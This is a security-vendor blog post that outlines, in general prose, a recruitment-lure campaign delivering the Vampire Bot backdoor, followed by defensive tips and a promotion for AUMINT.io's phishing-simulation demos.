In a sinister twist that targets career-hunters rather than corporate servers, the Vietnamese threat group BatShadow has launched a new campaign that uses fake job descriptions and recruitment lures to deliver a Go-based backdoor called Vampire Bot.
The attack vector is elegant and chilling: an email arrives from what appears to be a recruiter, with a ZIP attachment claiming to hold a job description or marketing brief. Inside you’ll find a decoy PDF alongside a malicious “.pdf.exe” executable or shortcut file. That launch triggers a PowerShell script which pulls down the Go-compiled payload.
Once the malware is on board, Vampire Bot starts rolling: it profiles system hardware and software, takes screenshots at intervals, harvests credentials, and reaches out to a command-and-control (C2) server via encrypted channels. This isn’t commodity malware – it’s built to blend into normal traffic and persist.
What makes this especially dangerous for firms like yours: the campaign targets job seekers and digital marketing professionals – exactly the human factor vulnerabilities that many organizations don’t hard-lock down. If a freelancer or new hire opens that lure while connected to your network, you could be looking at initial access you never detected.
Here’s what to do:
- Treat unsolicited job-offer attachments as high risk.
- Enable macro/script blocking and monitor for odd PowerShell commands.
- Use endpoint detection to look for scheduled tasks or services like “svcbot” dropped by this malware.
- Extend awareness training beyond current employees – to candidates, contractors, and third-party vendors.
- Use platforms like AUMINT.io to simulate these recruitment-style lures and track how your humans respond.
At AUMINT.io we help you build human cyber-resilience by simulating exactly this kind of attack vector and showing you where your weakest links are before adversaries exploit them. Protect your organization by closing the gap between hacker strategy and your human practice.
Schedule your personalised demo now and start uncovering hidden risk pathways – Book a Demo